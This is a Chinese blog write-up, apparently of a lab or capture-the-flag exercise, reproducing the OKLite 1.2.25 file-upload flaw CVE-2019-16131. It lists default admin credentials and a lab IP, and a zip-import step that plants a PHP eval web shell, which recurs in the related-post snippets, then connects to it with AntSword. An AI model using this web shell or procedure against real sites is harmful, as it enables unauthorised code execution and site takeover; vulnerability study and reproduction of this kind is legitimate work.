oklite 文件上传 (CVE-2019-16131)漏洞复现

已于 2024-04-03 09:48:50 修改
阅读量757 收藏 1
点赞数
文章标签: php 开发语言
于 2022-09-03 13:27:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42675091/article/details/126676478
版权

1.漏洞描述

         请使用chrome内核浏览器访问,点击某菜单可能多次跳转登录页面,系镜像bug,多登录几次即可 若通过webshell文件管理访问/tmp获取的flag错误,请使用虚拟终端手动跳转/tmp查看 锟铻科技 OKLite是中国锟铻科技公司的一套基于PHP的企业建站内容管理系统(CMS)。 锟铻科技 OKLite v1.2.25版本中的framework/admin/modulec_control.php文件存在代码问题漏洞,该漏洞源于ZIP归档文件的.php文件可以写入到/data/cache/。攻击者可利用该漏洞上传任意文件。

2.后台登录,密码为admin,admin

http://202.194.97.206:26948/admin.php

6945c22385c842c68a37b2efde93390e.png

3.模块管理-模块导入,导入test.zip,包含test.php,测试1.zip不行。

<?php @eval($_POST['cmd']);?>

94a954091b784b199452043bb127735d.png

3. 文件解析路径是:http://ip:26948/data/cache/test.php,直接蚁剑连接

0c84eafb8c884b4dab5b3cf126b191d8.png

 

 

weixin_42675091
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
OKLite 1.2.25 后台文件上传getshell
抚琴
01-08 421
OKLite是一套极简企业站系统,主要目标群体是展示型企业网站用户,让传统小企业快速布署网站,加强自身品牌意识,实现对公司形象的宣传。本系统最初是PHPOK程序精简而来。在同等配置下,OKLite速度优于PHPOK达30%以上。 通过上传任意文件漏洞,可以获得WebShell权限。 登录后台 admin admin123 把1.php压缩成1.zip <?php @eval($_POST[1]);?> 环境在我博客里下载docker ...
OKLite v1.2.25 任意文件删除漏洞CVE-2019-16132)
Darklord.W
11-19 759
OKLite v1.2.25 任意文件删除漏洞CVE-2019-16132) 漏洞描述: ​ An issue was discovered in OKLite v1.2.25. framework/admin/tpl_control.php allows remote attackers to delete arbitrary files via a title directory-traversal pathname followed by a crafted substring. 影响版本: ​ O
漏洞复现-oklite-文件上传】vulfocus/oklite-cve_2019_16131
10-10 1289
oklite-文件上传】抓包获取文件上传路径
oklite 文件上传漏洞CVE-2019-16131
小小猪的博客
12-29 968
oklite 文件上传漏洞CVE-2019-16131漏洞简介: Ethan发现OKLite v1.2.25 存在任意文件上传漏洞(需要登录后台) 影响范围: OKLite v1.2.25 版本 环境搭建: 在线环境 地址 漏洞复现: 访问首页 访问后台 账号密码:admin admin 进行登录 进入管理模块,点击模块导入 创建一句话zip 将创建的zip进行上传 上传成功 进行访问 蚁剑进行连接 获得shell 漏洞修复: ...
OKLite文件上传 (CVE-2019-16131)
m0_65150886的博客
01-24 454
锟铻科技 OKLite v1.2.25版本中的framework/admin/modulec_control.php文件存在代码问题漏洞,该漏洞源于ZIP归档文件的.php文件可以写入到/data/cache/。锟铻科技 OKLite是中国锟铻科技公司的一套基于PHP的企业建站内容管理系统(CMS)。2.访问http://ip:port/admin.php?1.访问http://ip:port,出现如下页面,开始实验。4.模块管理-模块导入,导入1.zip,包含1.php。3.输入账号密码进行登录。
CVE 2019 16131 OKLite v1.2.25 任意文件上传漏洞
wj33333的博客
10-27 78
OKLite v1.2.25 存在任意文件上传漏洞漏洞编号漏洞类型文件上传漏洞等级高危产品OKLite组件OKLite
PHPOK轻型企业站OKLite-PHP
06-20
如:减少缓存文件(P4完整版第一次运行就有可能生成上百个缓存文件,而Lite版不超过20个)性能更优。将Cache和DB重新分开,便于接入。 包含功能有: 网站基本信息管理,包括支持自定义扩展。 内容模块自定义管理,...
Xsafe#PeiQi-WIKI-POC#OKLite 1.2.25 后台插件安装 任意文件上传2
07-25
OKLite 1.2.25 后台插件安装 任意文件上传漏洞描述OKLite v1.2.25 后台插件过滤不完善导致可以上传恶意木马文件漏洞影响漏洞复现关于执行逻
WPS版OneKeyTools-Lite(多个PPT合并插件)
10-01
然而,当需要处理多个PPT文件时,手动合并可能会耗费大量时间和精力。为了解决这一问题,"WPS版OneKeyTools-Lite"应运而生,这是一个专门针对WPS Office设计的PPT批量处理插件,特别适用于需要合并多个PPT文件的场景...
PHPOK轻型企业站OKLite v2.0.32
09-28
为您提供PHPOK轻型企业站OKLite下载,Lite版本的出现,出于精简需求使用!从市场出发,考虑绝大多数小企业站的需求。程序不仅仅只是P4的简化,还有一些自己的优化!如:减少缓存文件(P4完整版第一次运行就有可能...
渗透测试常用poc、工具集合
01-06
CVE-2019-16131 OKLite v1.2.25任意文件上传漏洞 CVE-2019-16132 OKLite v1.2.25存在任意文件删除漏洞 CVE-2019-16309 FlameCMS 3.3.5后台登录处存在sql注入漏洞] CVE-2019-16313蜂网互联企业级路由器v4.31密码泄露...
春秋云镜 CVE-2019-16113
qq_22002773的博客
08-24 807
春秋云镜 CVE-2019-16113
Metasploit学习之渗透测试基础
习惯积淀的博客
12-31 321
文章目录渗透测试基础PTES标准中的渗透测试阶段渗透测试类型漏洞扫描器 渗透测试基础 PTES标准中的渗透测试阶段 前期交互阶段 与客户组织进行讨论,确定渗透测试的范围和目标。这个阶段最为关键的是需要让客户了解渗透测试将涉及哪些目标。而这个阶段也为你提供了机会,来说服客户走出全范围渗透测试的理想化愿景,选择更加现实可行的渗透测试目标来进行实际实施。 情报搜集阶段 采取各种可能的方法来搜集将要攻击...
Hack The Box——Blunder
江左盟的博客
08-25 1万+
简介 信息收集 使用nmap快速扫描目标主机端口和服务,目标主机仅开启了80端口,运行这Apache httpd 2.4.41,操作系统为Ubuntu,内核可能为2.6.32,如图: 然后访问80端口web服务,发现是作者记录的一些文章,如图: 随手输入admin发现页面跳转到登录页面,如图: 测试发现不存在常用弱口令和SQL注入,使用Google搜索BLUDIT发现此CSM系统存在很多已知漏洞,如目录遍历、文件上传、代码执行和暴力破解绕过。前面三个漏洞都需要拥有用户名和密码才能.
Hack the box靶机 Blunder
菜浪马废的博客
09-20 413
-更新CMS -关闭FTP-完成 -删除旧用户-完成 -通知弗格斯,新博客需要图片-待定 fergus应该是用户名 找到登录界面 bludit 3.9.2爆破脚本 #!/usr/bin/env python3 import re import requests #from __future__ import print_function def open_ressources(file_path): return [item.replace("\n", "") for item in ope..
CVE-2019-16920:D-link RCE漏洞
systemino的博客
10-10 1729
简介 2019年9月,Fortinet FortiGuard实验室发现并报告了D-Link 产品中的有个非认证的命令注入漏洞——CVE-2019-16920,成功利用该漏洞可以导致远程代码执行。因为该漏洞可以在不经过认证的情况下远程触发,因此研究人员将该漏洞评为中危。 受影响的产品包括D-Link的: ·DIR-655 ·DIR-866L ·DIR-652 ·DHP-1565 ...
libssh2被发现整数溢出和越界读取漏洞(CVE-2019-13115)
systemino的博客
07-14 1252
libssh2是一个C函数库,用来实现SSH2协议。SSH2是一套安全通讯协议框架(早期的SSH1由于存在安全漏洞),基于SSH2协议的产品主要有openssh,putty,SSH Secure Shell Client等,这些都是开源的,但是这些代码非常难懂而且复杂,一个个函数深层次的调用很快就让人在C语言代码的海洋中迷失了方向,妄图通过从这些开源软件中抽取程序代码段来“组装”自己的应用程序是非...
CVE-2019-16278:Nostromo Web服务器的远程命令执行
NOSEC2019的博客
10-22 2597
在这篇文章中,我将分析CVE-2019-16278漏洞的成因,以及如何去利用它。这个漏洞存在于Nostromo web服务上(又名nhttpd),这是一个开源的web服务,在Unix系统上非常流行,例如FreeBSD, OpenBSD等等。 Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/...
OK插件安装常见问题集锦(PowerPoint版)|OneKeyTools Lite安装说明
热门推荐
qq_34017390的博客
12-16 1万+
OneKeyTools Lite安装说明 (一)关于OneKeyTools Lite OneKeyTools Lite(轻简)版是由 @只为设计 个人独立开发的免费演示插件。Lite版分别支持微软Office 2007以上版本和WPS Office 2016以上版本,请根据自己需要下载相应版本 (二)支持软件 支持Microsoft Office 2007/2010/2013/2016/2019/365 (三)支持系统 支持Windows XP/Vista/7/8/8.1/10,不支持其他桌面或
什么是RPC?有哪些RPC框架?
最新发布
yuiezt的专栏
07-09 1847
RPC(Remote Procedure Call,远程过程调用)是一种允许运行在一台计算机上的程序调用另一台计算机上子程序的技术。这种技术屏蔽了底层的网络通信细节,使得程序间的远程通信如同本地调用一样简单。RPC机制使得开发者能够构建分布式计算系统,其中不同的组件可以分布在不同的计算机上,但它们之间可以像在同一台机器上一样相互调用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值